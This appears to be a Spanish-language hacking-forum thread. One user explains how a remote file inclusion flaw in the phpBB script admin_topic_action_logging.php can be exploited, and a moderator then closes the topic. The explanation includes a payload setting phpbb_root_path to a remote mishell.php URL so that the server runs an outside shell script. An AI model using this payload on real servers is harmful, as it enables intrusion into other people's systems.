Haber jbhz, ya te cerraron el post anterior por una pregunta similar. Te voy a dar una manito. Fijate el código vulnerable:
En php las cadenas de caracteres se concatenan con el ".". Las variables pasadas por url se leen desde el script con el $ antepuesto. Por ejemplo:
Desde miscript.php lees el valor de la variable mivar como $mivar.
Ahora, volviendo al código vulnerable, fijate que se intenta incluir lo que se defina en $phpbb_root_path concatenado con otras cadenas de caracteres que en este caso no interesan. Aca es donde podes hacer que se incluya un archivo remoto y se ejecute en el entorno del servidor.
Entonces si le pasamos una url sabiendo que el script vulnerable es admin_topic_action_logging.php y que tiene que estar definida también la variable $setmodules pues se chequea en el if:
Suponiendo que el script está en /phpbb/admin esto haría que pasara el if puesto que definimos $setmodules e intentaría incluir la siguiente cadena:
Bueno ahora como haces para sacarte de encima todo lo que le concatena?, fácil le pasas phpbb_root_path=http://www.misite.com/mishell.php? de modo que el resto de las cadenas sean parámetros para tu script.
Saludos.

1.- no es simbolo de pesos, es simbolo de interrogacion, "?"
2.- se pone la ruta al script vulnerable
3.- si no entiendes el codigo ni te molestes en explotarlo, lee las reglas.
4.- tema CERRADO

Saludos!!